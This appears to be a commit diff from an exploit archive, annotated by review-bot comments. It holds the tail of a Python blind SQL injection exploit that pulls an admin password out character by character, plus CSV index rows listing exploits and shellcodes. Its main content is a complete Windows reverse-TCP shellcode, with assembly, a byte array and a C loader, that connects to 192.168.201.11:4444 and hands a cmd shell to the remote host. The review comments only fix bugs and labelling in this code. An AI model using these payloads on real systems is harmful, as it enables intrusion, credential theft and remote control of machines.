data = {"pincode": f"' or (select(select (substring(password,{i},1)) from admin) = \"{j}\") -- - #", "submit": ''}
a = session.post(url, headers=headers, data=data)
counter += 1
if 'Course Enroll' in a.text:
sys.stdout.write(j)
sys.stdout.flush()
break
elif counter == len(pass_list):
find = True
break
if find:
break
print("\n\nSuccessfully pwnd :)")
def logo():
art = R'''
__/\\\\\\\\\\\\\____/\\\\\\\\\\\__/\\\\\_____/\\\__/\\\\_________/\\\__
_\/\\\/////////\\\_\/////\\\///__\/\\\\\\___\/\\\_\///\\________\/\\\__
_\/\\\_______\/\\\_____\/\\\_____\/\\\/\\\__\/\\\__/\\/_________\/\\\__
_\/\\\\\\\\\\\\\/______\/\\\_____\/\\\//\\\_\/\\\_\//___________\/\\\__
_\/\\\/////////________\/\\\_____\/\\\\//\\\\/\\\__________/\\\\\\\\\__
_\/\\\_________________\/\\\_____\/\\\_\//\\\/\\\_________/\\\////\\\__
_\/\\\_________________\/\\\_____\/\\\__\//\\\\\\________\/\\\__\/\\\__
_\/\\\______________/\\\\\\\\\\\_\/\\\___\//\\\\\________\//\\\\\\\/\\_
_\///______________\///////////__\///_____\/////__________\///////\//__
'''
info = 'CVE-2021-37357 PoC'.center(76)
credits = 'Created by @AffineSecurity and @qhum7sec'.center(76)
print(f"{art}\n{info}\n{credits}")
def main():
logo()
hostname = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
if len(sys.argv) != 4:
print("Usage: python3 exploit.py http://127.0.0.1:80 username password")
exploit(hostname, username, password)
if __name__ == '__main__':
main()
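Review bot: `main()` indexes `sys.argv[1]` to `sys.argv[3]` before the `len(sys.argv) != 4` check, so a missing argument raises `IndexError` instead of the usage text, and after printing usage the script still calls `exploit()`; move the check first and `sys.exit(1)` on failure. `user_list = pass_list` binds both names to the same list, so `user_list += list(string.ascii_uppercase)` also mutates `pass_list`; the comment `This range is not arbitrary and will cover md5 hashing` is then misleading, because the hash loop iterates the mutated list. The logo prints `CVE-2021-37357 PoC`, but the header has no `# CVE:` line; add it. The three identical `headers` dicts belong in one constant. For the fix, `pincode-verification.php` should bind `pincode` as a query parameter, and a burst of POSTs to that endpoint from one session is the detection signature.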


@ -44182,6 +44182,7 @@ id,file,description,date,author,type,platform,port
50123,exploits/php/webapps/50123.py,"Garbage Collection Management System 1.0 - SQL Injection + Arbitrary File Upload",1970-01-01,"Luca Bernardi",webapps,php,
50128,exploits/php/webapps/50128.py,"osCommerce 2.3.4.1 - Remote Code Execution (2)",1970-01-01,"Bryan Leong",webapps,php,
50129,exploits/php/webapps/50129.py,"WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Simone Cristofaro",webapps,php,
50132,exploits/hardware/webapps/50132.py,"Seagate BlackArmor NAS sg2000-2000.1331 - Command Injection",1970-01-01,"Metin Yunus Kandemir",webapps,hardware,
50137,exploits/php/webapps/50137.txt,"WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated)",1970-01-01,nhattruong,webapps,php,
50138,exploits/php/webapps/50138.txt,"WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation",1970-01-01,nhattruong,webapps,php,
50139,exploits/php/webapps/50139.txt,"WordPress Plugin Mimetic Books 0.2.13 - 'Default Publisher ID field' Stored Cross-Site Scripting (XSS)",1970-01-01,"Vikas Srivastava",webapps,php,
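Review bot: every row in this hunk, including the new `50132` line, carries `1970-01-01` in the `date` column while the exploit headers record real dates (the Seagate file says `# Date: 15.07.2021`); either populate the column from the header or document that it is unmaintained, since consumers of the CSV sort on it.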
@ -44264,9 +44265,11 @@ id,file,description,date,author,type,platform,port
50256,exploits/php/webapps/50256.txt,"WordPress Plugin Duplicate Page 4.4.1 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Nikhil Kapoor",webapps,php,
50254,exploits/hardware/webapps/50254.txt,"Compro Technology IP Camera - ' mjpegStreamer.cgi' Screenshot Disclosure",1970-01-01,icekam,webapps,hardware,
50255,exploits/multiple/webapps/50255.txt,"WPanel 4.3.1 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,Sentinal920,webapps,multiple,
50259,exploits/php/webapps/50259.txt,"OpenSIS 8.0 'modname' - Directory Traversal",1970-01-01,"Eric Salario",webapps,php,
50260,exploits/php/webapps/50260.txt,"OpenEMR 6.0.0 - 'noteid' Insecure Direct Object Reference (IDOR)",1970-01-01,"Allen Enosh Upputori",webapps,php,
50262,exploits/php/webapps/50262.py,"FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Mason Soroka-Gill",webapps,php,
50263,exploits/php/webapps/50263.txt,"Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)",1970-01-01,sudoninja,webapps,php,
50264,exploits/php/webapps/50264.py,"Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload",1970-01-01,a-rey,webapps,php,
50267,exploits/multiple/webapps/50267.txt,"Antminer Monitor 0.5.0 - Authentication Bypass",1970-01-01,Vulnz,webapps,multiple,
50268,exploits/php/webapps/50268.txt,"WordPress Plugin WP Sitemap Page 1.6.4 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Nikhil Kapoor",webapps,php,
50269,exploits/php/webapps/50269.py,"WordPress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection (2)",1970-01-01,"Mohin Paramasivam",webapps,php,
@ -44308,6 +44311,7 @@ id,file,description,date,author,type,platform,port
50323,exploits/php/webapps/50323.html,"Backdrop CMS 1.20.0 - 'Multiple' Cross-Site Request Forgery (CSRF)",1970-01-01,V1n1v131r4,webapps,php,
50324,exploits/php/webapps/50324.txt,"WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
50325,exploits/php/webapps/50325.html,"WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery (CSRF)",1970-01-01,0xB9,webapps,php,
50326,exploits/php/webapps/50326.txt,"Budget and Expense Tracker System 1.0 - Arbitrary File Upload",1970-01-01,"()t/\\/\\1",webapps,php,
50327,exploits/php/webapps/50327.txt,"Police Crime Record Management Project 1.0 - Time Based SQLi",1970-01-01,"()t/\\/\\1",webapps,php,
50328,exploits/aspx/webapps/50328.txt,"SmarterTools SmarterTrack 7922 - 'Multiple' Information Disclosure",1970-01-01,"Andrei Manole",webapps,aspx,
50329,exploits/php/webapps/50329.txt,"Pharmacy Point of Sale System 1.0 - SQLi Authentication BYpass",1970-01-01,"Janik Wehrli",webapps,php,
@ -44315,11 +44319,14 @@ id,file,description,date,author,type,platform,port
50334,exploits/php/webapps/50334.txt,"Library System 1.0 - 'student_id' SQL injection (Authenticated)",1970-01-01,"Vinay Bhuria",webapps,php,
50339,exploits/hardware/webapps/50339.txt,"FatPipe Networks WARP 10.2.2 - Authorization Bypass",1970-01-01,LiquidWorm,webapps,hardware,
50340,exploits/hardware/webapps/50340.txt,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Config Download (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware,
50341,exploits/hardware/webapps/50341.txt,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access)",1970-01-01,LiquidWorm,webapps,hardware,
50342,exploits/hardware/webapps/50342.py,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Remote Privilege Escalation",1970-01-01,LiquidWorm,webapps,hardware,
50343,exploits/php/webapps/50343.txt,"WordPress Plugin TranslatePress 2.0.8 - Stored Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,"Nosa Shandy",webapps,php,
50344,exploits/php/webapps/50344.txt,"WordPress Plugin Contact Form 1.7.14 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
50345,exploits/php/webapps/50345.txt,"WordPress Plugin Ultimate Maps 1.2.4 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
50346,exploits/php/webapps/50346.txt,"WordPress Plugin Popup 1.10.4 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
50348,exploits/php/webapps/50348.py,"Storage Unit Rental Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Ghuliev,webapps,php,
50350,exploits/php/webapps/50350.txt,"WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting",1970-01-01,0xB9,webapps,php,
50352,exploits/php/webapps/50352.txt,"OpenSIS 8.0 - 'cp_id_miss_attn' Reflected Cross-Site Scripting (XSS)",1970-01-01,"Eric Salario",webapps,php,
50353,exploits/php/webapps/50353.php,"Pet Shop Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Mr.Gedik,webapps,php,
50355,exploits/php/webapps/50355.txt,"Cyber Cafe Management System Project (CCMS) 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Sanjay Singh",webapps,php,
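Review bot: the new 50350 description "Reflected Cross-Site Scripting" lacks the "(XSS)" suffix that every sibling cross-site scripting row in this hunk uses (50343, 50344, 50345, 50346, 50352), including the other entries from the same author; "Reflected Cross-Site Scripting (XSS)" keeps the index searchable by abbreviation. Minor: the 50334 context row spells "SQL injection" in lower case while the rest of the file uses "SQL Injection".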
@ -44383,3 +44390,6 @@ id,file,description,date,author,type,platform,port
50437,exploits/windows/webapps/50437.txt,"Easy Chat Server 3.1 - Directory Traversal and Arbitrary File Read",1970-01-01,z4nd3r,webapps,windows,
50432,exploits/php/webapps/50432.txt,"Dolibarr ERP-CRM 14.0.2 - Stored Cross-Site Scripting (XSS) / Privilege Escalation",1970-01-01,"Oscar Gil Gutierrez",webapps,php,
50435,exploits/php/webapps/50435.txt,"Small CRM 3.0 - 'description' Stored Cross-Site Scripting (XSS)",1970-01-01,Ghuliev,webapps,php,
50438,exploits/java/webapps/50438.txt,"Jetty 9.4.37.v20210219 - Information Disclosure",1970-01-01,"Mayank Deshmukh",webapps,java,
50439,exploits/php/webapps/50439.py,"Clinic Management System 1.0 - SQL injection to Remote Code Execution",1970-01-01,"Pablo Santiago",webapps,php,
50440,exploits/php/webapps/50440.txt,"Online Course Registration 1.0 - Blind Boolean-Based SQL Injection (Authenticated)",1970-01-01,"Sam Ferguson",webapps,php,
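Review bot: the id order is broken at the tail of the file: 50437 precedes 50432 and 50435, and the three new rows 50438, 50439 and 50440 are appended after them, so the CSV is insertion-ordered rather than id-sorted; if anything merges or diffs this file by sorted id, move 50437 after 50435 so the new block continues an ascending sequence. Minor: the 50439 description "SQL injection to Remote Code Execution" should use "SQL Injection" like the other rows.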



View file

@ -1025,3 +1025,4 @@ id,file,description,date,author,type,platform
48592,shellcodes/linux_x86/48592.c,"Linux/x86 - Disable ASLR Security + Polymorphic Shellcode (124 bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,linux_x86
48703,shellcodes/linux_x86/48703.c,"Linux/x86 - Egghunter (0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)",1970-01-01,danf42,shellcode,linux_x86
48718,shellcodes/windows_x86/48718.c,"Windows/x86 - Download File (http://192.168.43.192:8080/9MKWaRO.hta) Via mshta Shellcode (100 bytes)",1970-01-01,"Siddharth Sharma",shellcode,windows_x86
50291,shellcodes/windows_x86-64/50291.c,"Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,windows_x86-64
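Review bot: the new 50291 row files the payload under `shellcodes/windows_x86-64/` with a "Windows/x64" title, but the source it points to (added in the same commit, further down) assembles with `[BITS 32]` and reads the PEB through `FS:[ecx + 0x30]`, which makes it a 32-bit payload; the platform column should follow the actual bitness, or the description should state that it targets 32-bit (WOW64) processes on x64 hosts. Minor: the sibling rows write "bytes" in lower case, this one writes "330 Bytes".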


View file

@ -0,0 +1,290 @@
# Title: Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)
# Date: 09.12.2021
# Author: Xenofon Vassilakopoulos
# Tested on: Windows/x64 - 10.0.19043 N/A Build 19043
/*
MIT License
Copyright (c) 2021 Xenofon Vassilakopoulos
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
[BITS 32]
global _start
section .text
_start:
; Locate Kernelbase.dll address
XOR ECX, ECX ;zero out ECX
MOV EAX, FS:[ecx + 0x30] ;EAX = PEB
MOV EAX, [EAX + 0x0c] ;EAX = PEB->Ldr
MOV ESI, [EAX + 0x14] ;ESI = PEB->Ldr.InMemoryOrderModuleList
LODSD ;memory address of the second list entry structure
XCHG EAX, ESI ;EAX = ESI , ESI = EAX
LODSD ;memory address of the third list entry structure
XCHG EAX, ESI ;EAX = ESI , ESI = EAX
LODSD ;memory address of the fourth list entry structure
MOV EBX, [EAX + 0x10] ;EBX = Base address
; Export Table
MOV EDX, DWORD [EBX + 0x3C] ;EDX = DOS->e_lfanew
ADD EDX, EBX ;EDX = PE Header
MOV EDX, DWORD [EDX + 0x78] ;EDX = Offset export table
ADD EDX, EBX ;EDX = Export table
MOV ESI, DWORD [EDX + 0x20] ;ESI = Offset names table
ADD ESI, EBX ;ESI = Names table
XOR ECX, ECX ;EXC = 0
GetFunction :
INC ECX; increment counter
LODSD ;Get name offset
ADD EAX, EBX ;Get function name
CMP dword [EAX], 0x50746547 ;"PteG"
JNZ SHORT GetFunction ;jump to GetFunction label if not "GetP"
CMP dword [EAX + 0x4], 0x41636F72 ;"rocA"
JNZ SHORT GetFunction ;jump to GetFunction label if not "rocA"
CMP dword [EAX + 0x8], 0x65726464 ;"ddre"
JNZ SHORT GetFunction ;jump to GetFunction label if not "ddre"
MOV ESI, DWORD [EDX + 0x24] ;ESI = Offset ordinals
ADD ESI, EBX ;ESI = Ordinals table
MOV CX, WORD [ESI + ECX * 2] ;CX = Number of function
DEC ECX ;Decrement the ordinal
MOV ESI, DWORD [EDX + 0x1C] ;ESI = Offset address table
ADD ESI, EBX ;ESI = Address table
MOV EDX, DWORD [ESI + ECX * 4] ;EDX = Pointer(offset)
ADD EDX, EBX ;EDX = GetProcAddress
; Get the Address of LoadLibraryA function
XOR ECX, ECX ;ECX = 0
PUSH EBX ;Kernel32 base address
PUSH EDX ;GetProcAddress
PUSH ECX ;0
PUSH 0x41797261 ;"Ayra"
PUSH 0x7262694C ;"rbiL"
PUSH 0x64616F4C ;"daoL"
PUSH ESP ;"LoadLibrary"
PUSH EBX ;Kernel32 base address
MOV ESI, EBX ;save the kernel32 address in esi for later
CALL EDX ;GetProcAddress(LoadLibraryA)
ADD ESP, 0xC ;pop "LoadLibraryA"
POP EDX ;EDX = 0
PUSH EAX ;EAX = LoadLibraryA
PUSH EDX ;ECX = 0
MOV DX, 0x6C6C ;"ll"
PUSH EDX
PUSH 0x642E3233 ;"d.23"
PUSH 0x5F327377 ;"_2sw"
PUSH ESP ;"ws2_32.dll"
CALL EAX ;LoadLibrary("ws2_32.dll")
ADD ESP, 0x10 ;Clean stack
MOV EDX, [ESP + 0x4] ;EDX = GetProcAddress
PUSH 0x61617075 ;"aapu"
SUB word [ESP + 0x2], 0x6161 ;"pu" (remove "aa")
PUSH 0x74726174 ;"trat"
PUSH 0x53415357 ;"SASW"
PUSH ESP ;"WSAStartup"
PUSH EAX ;ws2_32.dll address
MOV EDI, EAX ;save ws2_32.dll to use it later
CALL EDX ;GetProcAddress(WSAStartup)
; Call WSAStartUp
XOR EBX, EBX ;zero out ebx register
MOV BX, 0x0190 ;EAX = sizeof(struct WSAData)
SUB ESP, EBX ;allocate space for the WSAData structure
PUSH ESP ;push a pointer to WSAData structure
PUSH EBX ;Push EBX as wVersionRequested
CALL EAX ;Call WSAStartUp
;Find the address of WSASocketA
ADD ESP, 0x10 ;Align the stack
XOR EBX, EBX ;zero out the EBX register
ADD BL, 0x4 ;add 0x4 at the lower register BL
IMUL EBX, 0x64 ;EBX = 0x190
MOV EDX, [ESP + EBX] ;EDX has the address of GetProcAddress
PUSH 0x61614174 ;"aaAt"
SUB word [ESP + 0x2], 0x6161 ;"At" (remove "aa")
PUSH 0x656b636f ;"ekco"
PUSH 0x53415357 ;"SASW"
PUSH ESP ;"WSASocketA", GetProcAddress 2nd argument
MOV EAX, EDI ;EAX now holds the ws2_32.dll address
PUSH EAX ;push the first argument of GetProcAddress
CALL EDX ;call GetProcAddress
PUSH EDI ;save the ws2_32.dll address to use it later
;call WSASocketA
XOR ECX, ECX ;zero out ECX register
PUSH EDX ;null value for dwFlags argument
PUSH EDX ;zero value since we dont have an existing socket group
PUSH EDX ;null value for lpProtocolInfo
MOV DL, 0x6 ;IPPROTO_TCP
PUSH EDX ;set the protocol argument
INC ECX ;SOCK_STREAM(TCP)
PUSH ECX ;set the type argument
INC ECX ;AF_INET(IPv4)
PUSH ECX ;set the ddress family specification argument
CALL EAX ;call WSASocketA
XCHG EAX, ECX ;save the socket returned from WSASocketA at EAX to ECX in order to use it later
;Find the address of connect
POP EDI ;load previously saved ws2_32.dll address to ECX
ADD ESP, 0x10 ;Align stack
XOR EBX, EBX ;zero out EBX
ADD BL, 0x4 ;add 0x4 to lower register BL
IMUL EBX, 0x63 ;EBX = 0x18c
MOV EDX, [ESP + EBX] ;EDX has the address of GetProcAddress
PUSH 0x61746365 ;"atce"
SUB word [ESP + 0x3], 0x61 ;"tce" (remove "a")
PUSH 0x6e6e6f63 ;"nnoc"
PUSH ESP ;"connect", second argument of GetProcAddress
PUSH EDI ;ws32_2.dll address, first argument of GetProcAddress
XCHG ECX, EBP
CALL EDX ;call GetProcAddress
;call connect
PUSH 0x0bc9a8c0 ;sin_addr set to 192.168.201.11
PUSH word 0x5c11 ;port = 4444
XOR EBX, EBX ;zero out EBX
add BL, 0x2 ;TCP protocol
PUSH word BX ;push the protocol value on the stack
MOV EDX, ESP ;pointer to sockaddr structure (IP,Port,Protocol)
PUSH byte 16 ;the size of sockaddr - 3rd argument of connect
PUSH EDX ;push the sockaddr - 2nd argument of connect
PUSH EBP ;socket descriptor = 64 - 1st argument of connect
XCHG EBP, EDI
CALL EAX ;execute connect;
;Find the address of CreateProcessA
ADD ESP, 0x14 ;Clean stack
XOR EBX, EBX ;zero out EBX
ADD BL, 0x4 ;add 0x4 to lower register BL
IMUL EBX, 0x62 ;EBX = 0x194
MOV EDX, [ESP + EBX] ;EDX has the address of GetProcAddress
PUSH 0x61614173 ;"aaAs"
SUB dword [ESP + 0x2], 0x6161 ;"As"
PUSH 0x7365636f ;"seco"
PUSH 0x72506574 ;"rPet"
PUSH 0x61657243 ;"aerC"
PUSH ESP ;"CreateProcessA" - 2nd argument of GetProcAddress
MOV EBP, ESI ;move the kernel32.dll to EBP
PUSH EBP ;kernel32.dll address - 1st argument of GetProcAddress
CALL EDX ;execute GetProcAddress
PUSH EAX ;address of CreateProcessA
LEA EBP, [EAX] ;EBP now points to the address of CreateProcessA
;call CreateProcessA
PUSH 0x61646d63 ;"admc"
SUB word [ESP + 0x3], 0x61 ;"dmc" ( remove a)
MOV ECX, ESP ;ecx now points to "cmd" string
XOR EDX, EDX ;zero out EDX
SUB ESP, 16
MOV EBX, esp ;pointer for ProcessInfo
;STARTUPINFOA struct
PUSH EDI ;hStdError => saved socket
PUSH EDI ;hStdOutput => saved socket
PUSH EDI ;hStdInput => saved socket
PUSH EDX ;lpReserved2 => NULL
PUSH EDX ;cbReserved2 => NULL
XOR EAX, EAX ;zero out EAX register
INC EAX ;EAX => 0x00000001
ROL EAX, 8 ;EAX => 0x00000100
PUSH EAX ;dwFlags => STARTF_USESTDHANDLES 0x00000100
PUSH EDX ;dwFillAttribute => NULL
PUSH EDX ;dwYCountChars => NULL
PUSH EDX ;dwXCountChars => NULL
PUSH EDX ;dwYSize => NULL
PUSH EDX ;dwXSize => NULL
PUSH EDX ;dwY => NULL
PUSH EDX ;dwX => NULL
PUSH EDX ;pTitle => NULL
PUSH EDX ;pDesktop => NULL
PUSH EDX ;pReserved => NULL
XOR EAX, EAX ;zero out EAX
ADD AL, 44 ;cb => 0x44 (size of struct)
PUSH EAX ;eax points to STARTUPINFOA
;ProcessInfo struct
MOV EAX, ESP ;pStartupInfo
PUSH EBX ;pProcessInfo
PUSH EAX ;pStartupInfo
PUSH EDX ;CurrentDirectory => NULL
PUSH EDX ;pEnvironment => NULL
PUSH EDX ;CreationFlags => 0
XOR EAX, EAX ;zero out EAX register
INC EAX ;EAX => 0x00000001
PUSH EAX ;InheritHandles => TRUE => 1
PUSH EDX ;pThreadAttributes => NULL
PUSH EDX ;pProcessAttributes => NULL
PUSH ECX ;pCommandLine => pointer to "cmd"
PUSH EDX ;ApplicationName => NULL
CALL EBP ;execute CreateProcessA
*/
#include <windows.h>
#include <iostream>
#include <stdlib.h>
char code[] =
"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x96\xad\x8b"
"\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31"
"\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f"
"\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde"
"\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x31\xc9\x53"
"\x52\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54"
"\x53\x89\xde\xff\xd2\x83\xc4\x0c\x5a\x50\x52\x66\xba\x6c\x6c\x52\x68\x33"
"\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xff\xd0\x83\xc4\x10\x8b\x54\x24\x04"
"\x68\x75\x70\x61\x61\x66\x81\x6c\x24\x02\x61\x61\x68\x74\x61\x72\x74\x68"
"\x57\x53\x41\x53\x54\x50\x89\xc7\xff\xd2\x31\xdb\x66\xbb\x90\x01\x29\xdc"
"\x54\x53\xff\xd0\x83\xc4\x10\x31\xdb\x80\xc3\x04\x6b\xdb\x64\x8b\x14\x1c"
"\x68\x74\x41\x61\x61\x66\x81\x6c\x24\x02\x61\x61\x68\x6f\x63\x6b\x65\x68"
"\x57\x53\x41\x53\x54\x89\xf8\x50\xff\xd2\x57\x31\xc9\x52\x52\x52\xb2\x06"
"\x52\x41\x51\x41\x51\xff\xd0\x91\x5f\x83\xc4\x10\x31\xdb\x80\xc3\x04\x6b"
"\xdb\x63\x8b\x14\x1c\x68\x65\x63\x74\x61\x66\x83\x6c\x24\x03\x61\x68\x63"
"\x6f\x6e\x6e\x54\x57\x87\xcd\xff\xd2\x68\xc0\xa8\xc9\x0b\x66\x68\x11\x5c"
"\x31\xdb\x80\xc3\x02\x66\x53\x89\xe2\x6a\x10\x52\x55\x87\xef\xff\xd0\x83"
"\xc4\x14\x31\xdb\x80\xc3\x04\x6b\xdb\x62\x8b\x14\x1c\x68\x73\x41\x61\x61"
"\x81\x6c\x24\x02\x61\x61\x00\x00\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72"
"\x68\x43\x72\x65\x61\x54\x89\xf5\x55\xff\xd2\x50\x8d\x28\x68\x63\x6d\x64"
"\x61\x66\x83\x6c\x24\x03\x61\x89\xe1\x31\xd2\x83\xec\x10\x89\xe3\x57\x57"
"\x57\x52\x52\x31\xc0\x40\xc1\xc0\x08\x50\x52\x52\x52\x52\x52\x52\x52\x52"
"\x52\x52\x31\xc0\x04\x2c\x50\x89\xe0\x53\x50\x52\x52\x52\x31\xc0\x40\x50"
"\x52\x52\x51\x52\xff\xd5";
int main(int argc, char** argv)
{
//HWND hWnd = GetConsoleWindow();
//ShowWindow(hWnd, SW_HIDE);
printf("Shellcode Length: %d\n", strlen(code));
void* exec = VirtualAlloc(0, strlen(code), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, code, sizeof(code));
((void(*)())exec)();
return 0;
}
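Review bot: the byte array contains two NUL bytes and the advertised length is a strlen() artefact. In the CreateProcessA name-building step, `SUB dword [ESP + 0x2], 0x6161` assembles to `\x81\x6c\x24\x02\x61\x61\x00\x00`, whereas the matching steps for WSAStartup and WSASocketA use `SUB word`, which encodes without nulls. Counting the array gives 23 lines of 18 bytes plus 6, that is 420 bytes, of which exactly 330 precede the first `\x00`; so `printf("Shellcode Length: %d\n", strlen(code))` reports 330, the title repeats that number, and the payload only runs here because `memcpy(exec, code, sizeof(code))` copies all 421 bytes into a page-rounded VirtualAlloc region, while anything that treats `code` as a C string truncates it mid-instruction. Change the operand size to `word` so the encoding matches the other two, and size the buffer from `sizeof(code) - 1` rather than `strlen`. The header and directory also say x64, but the listing is `[BITS 32]`, reads the PEB via `FS:[ecx + 0x30]` and uses 4-byte structure offsets (`[EAX + 0x0c]` for Ldr, `[ESI + 0x14]` for the module list), so this is an x86 payload that runs on 64-bit Windows only inside a WOW64 process; file it under windows_x86 or say so in the header. Two smaller points in the assembly: the three `PUSH EDX` used as NULL arguments to WSASocketA come straight after `CALL EDX` (GetProcAddress) with only ECX zeroed, so they depend on a volatile register happening to be 0 on return, unlike the explicit `XOR EDX, EDX` before CreateProcessA; and the comments `;TCP protocol` on `add BL, 0x2` (that value is sin_family = AF_INET) and `;EAX = sizeof(struct WSAData)` on `MOV BX, 0x0190` describe the wrong thing. In the C harness, printf and strlen are used without <stdio.h> and <string.h> (only <iostream> pulls them in transitively), and `%d` is paired with a size_t.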